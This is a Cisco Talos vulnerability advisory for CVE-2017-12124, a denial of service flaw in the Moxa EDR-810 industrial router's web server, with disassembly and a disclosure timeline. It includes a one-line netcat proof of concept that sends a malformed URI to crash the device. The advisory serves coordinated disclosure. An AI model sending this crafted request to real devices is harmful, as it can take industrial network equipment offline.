Talos Vulnerability Report

TALOS-2017-0476

Moxa EDR-810 Web Server URI Denial of Service Vulnerability

April 13, 2018
CVE Number

CVE-2017-12124

Summary

An exploitable denial of service vulnerability exists in the web server functionality of Moxa EDR-810 V4.1 build 17030317. A specially crafted HTTP URI can cause a null pointer dereference resulting in the web server crashing. An attacker can send a crafted URI to trigger this vulnerability.

Tested Versions

Moxa EDR-810 V4.1 build 17030317

Product URLs

https://www.moxa.com/product/EDR-810.htm

CVSSv3 Score

7.5 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CWE

CWE-20 - Improper Input Validation

Details

When the web server is processing HTTP requests it checks the first character of the URI for a / (0x2F). If the first character is not a 0x2F the service will crash.

.text:00061460                 LDR             R3, [R11,#s1]
.text:00061464                 LDRB            R3, [R3]
.text:00061468                 CMP             R3, #0x2F ; '/'
.text:0006146C                 BEQ             loc_61454

Exploit Proof-of-Concept

echo 'GET A HTTP/1.1' | nc -nv 192.168.127.254 80

Timeline

2017-11-15 - Vendor Disclosure
2017-11-19 - Vendor Acknowledged
2017-12-25 - Vendor provided timeline for fix (Feb 2018)
2018-01-04 - Timeline pushed to mid-March per vendor
2018-03-24 - Talos follow up with vendor for release timeline
2018-03-26 - Timeline pushed to 4/13/18 per vendor
2018-04-12 - Vendor patched & published new firmware on website
2018-04-13 - Public Release

Credit

Discovered by Carlos Pacho of Cisco Talos.